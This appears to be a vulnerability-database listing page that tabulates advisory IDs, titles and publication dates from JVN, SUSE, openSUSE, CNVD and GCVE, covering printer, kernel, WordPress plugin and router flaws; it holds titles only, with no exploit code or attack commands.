jvndb-2025-000035	Improper file access permission settings in PC Time Tracer	2025-06-03T14:40+09:00	2025-06-03T14:40+09:00
jvndb-2025-000034	Multiple vulnerabilities in wivia 5	2025-05-30T15:57+09:00	2025-05-30T15:57+09:00
jvndb-2025-001238	Multiple out-of-bounds write vulnerabilities in Canon Office/Small Office Multifunction Printers and Laser Printers	2025-01-29T13:41+09:00	2025-05-27T16:06+09:00
jvndb-2025-000032	Mailform Pro CGI generating error messages containing sensitive information	2025-05-26T14:22+09:00	2025-05-26T14:22+09:00
jvndb-2025-000033	Improper pattern file validation in i-FILTER optional feature 'Anti-Virus & Sandbox'	2025-05-23T15:36+09:00	2025-05-23T15:36+09:00
jvndb-2025-005467	Passback vulnerabilities in Canon Production Printers, Office/Small Office Multifunction Printers, and Laser Printers	2025-05-22T15:03+09:00	2025-05-22T15:03+09:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description
ts-2025-004	TS-2025-004
ts-2025-003	TS-2025-003
ts-2025-002	TS-2025-002
ts-2025-001	TS-2025-001
ts-2024-013	TS-2024-013
ts-2024-012	TS-2024-012
ts-2024-011	TS-2024-011
ts-2024-010	TS-2024-010
ts-2024-009	TS-2024-009
ts-2024-008	TS-2024-008
ts-2024-007	TS-2024-007
ts-2024-006	TS-2024-006
ts-2024-005	TS-2024-005
ts-2024-004	TS-2024-004
ts-2024-003	TS-2024-003
ts-2024-002	TS-2024-002
ts-2024-001	TS-2024-001
ts-2023-009	TS-2023-009
ts-2023-008	TS-2023-008
ts-2023-007	TS-2023-007
ts-2023-006	TS-2023-006
ts-2023-005	TS-2023-005
ts-2023-004	TS-2023-004
ts-2023-003	TS-2023-003
ts-2023-002	TS-2023-002
ts-2023-001	TS-2023-001
ts-2022-005	TS-2022-005
ts-2022-004	TS-2022-004
ts-2022-003	TS-2022-003
ts-2022-002	TS-2022-002

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
suse-su-2025:02096-1	Security update for the Linux Kernel (Live Patch 60 for SLE 12 SP5)	2025-06-24T14:33:45Z	2025-06-24T14:33:45Z
suse-su-2025:02095-1	Security update for the Linux Kernel (Live Patch 56 for SLE 12 SP5)	2025-06-24T14:33:39Z	2025-06-24T14:33:39Z
suse-su-2025:02090-1	Security update for the Linux Kernel (Live Patch 65 for SLE 12 SP5)	2025-06-24T12:34:03Z	2025-06-24T12:34:03Z
suse-su-2025:02089-1	Security update for python311	2025-06-24T12:08:17Z	2025-06-24T12:08:17Z
suse-su-2025:02088-1	Security update for webkit2gtk3	2025-06-24T12:06:18Z	2025-06-24T12:06:18Z
suse-su-2025:0063-1	Security update for gstreamer-plugins-good	2025-06-24T12:03:30Z	2025-06-24T12:03:30Z
suse-su-2025:00063-1	Security update for gstreamer-plugins-good	2025-06-24T12:03:30Z	2025-06-24T12:03:30Z
suse-su-2025:02087-1	Security update for the Linux Kernel (Live Patch 64 for SLE 12 SP5)	2025-06-24T11:33:56Z	2025-06-24T11:33:56Z
suse-su-2025:02082-1	Security update for pam-config	2025-06-24T10:28:56Z	2025-06-24T10:28:56Z
suse-su-2025:02081-1	Security update for pam-config	2025-06-24T10:26:44Z	2025-06-24T10:26:44Z
suse-su-2025:02080-1	Security update for pam-config	2025-06-24T10:26:24Z	2025-06-24T10:26:24Z
suse-su-2025:02079-1	Security update for icu	2025-06-24T10:24:22Z	2025-06-24T10:24:22Z
suse-su-2025:02077-1	Security update for the Linux Kernel RT (Live Patch 3 for SLE 15 SP6)	2025-06-24T09:33:58Z	2025-06-24T09:33:58Z
suse-su-2025:02076-1	Security update for the Linux Kernel RT (Live Patch 1 for SLE 15 SP6)	2025-06-24T09:33:54Z	2025-06-24T09:33:54Z
suse-su-2025:02075-1	Security update for the Linux Kernel (Live Patch 59 for SLE 12 SP5)	2025-06-24T09:03:59Z	2025-06-24T09:03:59Z
suse-su-2025:02074-1	Security update for python313	2025-06-24T07:26:36Z	2025-06-24T07:26:36Z
suse-su-2025:02073-1	Security update for the Linux Kernel RT (Live Patch 7 for SLE 15 SP6)	2025-06-23T21:20:29Z	2025-06-23T21:20:29Z
suse-su-2025:02072-1	Security update for the Linux Kernel RT (Live Patch 6 for SLE 15 SP6)	2025-06-23T20:03:58Z	2025-06-23T20:03:58Z
suse-su-2025:02071-1	Security update for the Linux Kernel RT (Live Patch 5 for SLE 15 SP6)	2025-06-23T20:03:55Z	2025-06-23T20:03:55Z
suse-su-2025:02070-1	Security update for the Linux Kernel RT (Live Patch 2 for SLE 15 SP6)	2025-06-23T20:03:51Z	2025-06-23T20:03:51Z
suse-su-2025:02069-1	Security update for the Linux Kernel RT (Live Patch 0 for SLE 15 SP6)	2025-06-23T16:04:03Z	2025-06-23T16:04:03Z
suse-su-2025:02066-1	Security update for distribution	2025-06-23T10:48:35Z	2025-06-23T10:48:35Z
suse-su-2025:02059-1	Security update for icu	2025-06-23T01:38:08Z	2025-06-23T01:38:08Z
suse-su-2025:02058-1	Security update for gstreamer-plugins-good	2025-06-21T09:04:59Z	2025-06-21T09:04:59Z
suse-su-2025:02057-1	Security update for python311	2025-06-21T09:04:25Z	2025-06-21T09:04:25Z
suse-su-2025:02056-1	Security update for apache-commons-beanutils	2025-06-20T16:17:22Z	2025-06-20T16:17:22Z
suse-su-2025:02055-1	Security update for gstreamer-plugins-good	2025-06-20T15:35:07Z	2025-06-20T15:35:07Z
suse-su-2025:02053-1	Security update for gstreamer-plugins-good	2025-06-20T13:05:43Z	2025-06-20T13:05:43Z
suse-su-2025:02052-1	Security update for apache2-mod_security2	2025-06-20T13:04:57Z	2025-06-20T13:04:57Z
suse-su-2025:02051-1	Security update for perl	2025-06-20T12:42:29Z	2025-06-20T12:42:29Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
opensuse-su-2025:15324-1	python311-pycares-4.9.0-1.1 on GA media	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
opensuse-su-2025:15323-1	libpoppler-cpp2-25.06.0-1.1 on GA media	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
opensuse-su-2025:15322-1	libPocoActiveRecord112-1.14.2-1.1 on GA media	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
opensuse-su-2025:15321-1	libxml2-2-2.13.8-2.1 on GA media	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
opensuse-su-2025:15320-1	avif-tools-1.3.0-2.1 on GA media	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
opensuse-su-2025:15319-1	djvulibre-3.5.29-1.1 on GA media	2025-07-08T00:00:00Z	2025-07-08T00:00:00Z
opensuse-su-2025:15316-1	python311-Pillow-11.3.0-1.1 on GA media	2025-07-06T00:00:00Z	2025-07-06T00:00:00Z
opensuse-su-2025:15315-1	libmozjs-128-0-128.12.0-1.1 on GA media	2025-07-06T00:00:00Z	2025-07-06T00:00:00Z
opensuse-su-2025:15314-1	dpkg-1.22.21-1.1 on GA media	2025-07-06T00:00:00Z	2025-07-06T00:00:00Z
opensuse-su-2025:15313-1	apache2-mod_security2-2.9.11-1.1 on GA media	2025-07-06T00:00:00Z	2025-07-06T00:00:00Z
opensuse-su-2025:15312-1	MozillaThunderbird-128.12.0-1.1 on GA media	2025-07-06T00:00:00Z	2025-07-06T00:00:00Z
opensuse-su-2025:15311-1	xwayland-24.1.8-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15310-1	xorg-x11-server-21.1.15-6.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15309-1	libwx_gtk2u_adv-suse16_0_0-3.2.8-4.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15308-1	libwireshark18-4.4.7-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15307-1	velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15306-1	valkey-8.1.2-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15305-1	traefik2-2.11.26-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15304-1	traefik-3.4.3-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15303-1	tomcat11-11.0.8-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15302-1	tomcat10-10.1.42-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15301-1	tomcat-9.0.106-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15300-1	teleport-17.5.3-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15299-1	libsystemd0-257.7-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15298-1	sudo-1.9.17p1-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15297-1	libspdlog1_15-1.15.3-2.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15296-1	ctdb-4.22.2+git.396.c752843dcf4-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15295-1	python311-salt-3006.0-41.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15294-1	keylime-ima-policy-0.2.7+70-2.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z
opensuse-su-2025:15293-1	redis-8.0.2-1.1 on GA media	2025-07-03T00:00:00Z	2025-07-03T00:00:00Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
cnvd-2025-13031	北京网动网络科技股份有限公司网动统一通信平台存在信息泄露漏洞	2025-04-28	2025-06-21
cnvd-2025-12970	武汉达梦数据库股份有限公司达梦新云缓存数据库存在二进制漏洞	2025-04-30	2025-06-21
cnvd-2025-13257	TOTOLINK A3600R UploadCustomModule函数缓冲区溢出漏洞	2024-07-31	2025-06-20
cnvd-2025-13256	TOTOLINK A3600R setWiFiAclAddConfig函数缓冲区溢出漏洞	2024-07-31	2025-06-20
cnvd-2025-13255	TOTOLINK A3600R setUrlFilterRules函数缓冲区溢出漏洞	2024-07-31	2025-06-20
cnvd-2025-13254	TOTOLINK A3600R setPortForwardRules函数缓冲区溢出漏洞	2024-07-31	2025-06-20
cnvd-2025-13253	TOTOLINK A3600R setParentalRules函数缓冲区溢出漏洞	2024-07-31	2025-06-20
cnvd-2025-13201	WordPress PayU India plugin存在未明漏洞	2025-06-17	2025-06-20
cnvd-2025-13186	WordPress Password Policy Manager plugin存在未明漏洞	2025-06-17	2025-06-20
cnvd-2025-13185	WordPress MC Woocommerce Wishlist plugin跨站脚本漏洞	2025-06-17	2025-06-20
cnvd-2025-13128	WordPress Krowd plugin文件包含漏洞	2025-06-17	2025-06-20
cnvd-2025-13127	WordPress Inset plugin文件包含漏洞	2025-06-17	2025-06-20
cnvd-2025-13126	WordPress inprosysmedia-likes-dislikes-post plugin SQL注入漏洞	2025-06-17	2025-06-20
cnvd-2025-13094	WordPress Grill and Chow plugin路径遍历漏洞	2025-06-17	2025-06-20
cnvd-2025-13093	WordPress GrandPrix plugin路径遍历漏洞	2025-06-17	2025-06-20
cnvd-2025-13092	WordPress GiftXtore plugin文件包含漏洞	2025-06-17	2025-06-20
cnvd-2025-13091	WordPress Formulario de contacto SalesUp! plugin跨站脚本漏洞	2025-06-17	2025-06-20
cnvd-2025-13090	WordPress FlatNews plugin跨站脚本漏洞	2025-06-17	2025-06-20
cnvd-2025-13089	友讯科技DIR-605L formWlanSetup_Wizard函数缓冲区溢出漏洞	2024-10-13	2025-06-20
cnvd-2025-13088	友讯科技DIR-605L formSetWizard2函数缓冲区溢出漏洞	2024-10-13	2025-06-20
cnvd-2025-13086	Dell BSAFE信任管理问题漏洞	2025-02-17	2025-06-20
cnvd-2025-13085	Dell SmartFabric OS10服务端请求伪造漏洞	2025-03-19	2025-06-20
cnvd-2025-13084	Dell SmartFabric OS10权限提升漏洞	2025-03-19	2025-06-20
cnvd-2025-13083	Dell ThinOS授权问题漏洞	2025-03-27	2025-06-20
cnvd-2025-13082	Dell Wyse Management Suite WMS信息泄露漏洞	2025-06-17	2025-06-20
cnvd-2025-13081	Dell Wyse Management Suite WMS路径遍历漏洞	2025-06-17	2025-06-20
cnvd-2025-13080	友讯科技DIR-605L formSetWanPPPoE函数缓冲区溢出漏洞	2024-10-13	2025-06-20
cnvd-2025-13079	友讯科技DIR-605L formSetWAN_Wizard52函数缓冲区溢出漏洞	2024-10-13	2025-06-20
cnvd-2025-13078	友讯科技DIR-605L formSetQoS函数缓冲区溢出漏洞	2024-10-13	2025-06-20
cnvd-2025-13077	D-Link DIR-823X空指针取消引用漏洞	2025-02-18	2025-06-20

Vulnerabilities are sorted by update time (recent to old).
ID	CVSS	Description	Vendor	Product	Published	Updated
gcve-1-2025-0002	8.9 (v4.0)	Command Injection in Cl0p Exfiltration Python Script	Cl0p ransomware	exfiltration	2025-07-01T08:19:00.000Z	2025-07-01T10:58:58.443468Z
gcve-1-2025-0001	5.3 (v4.0)	The absence of a password confirmation step when deact…	CIRCL	Vulnerability-Lookup	2025-05-27T08:58:00.000Z	2025-05-30T14:27:56.273945Z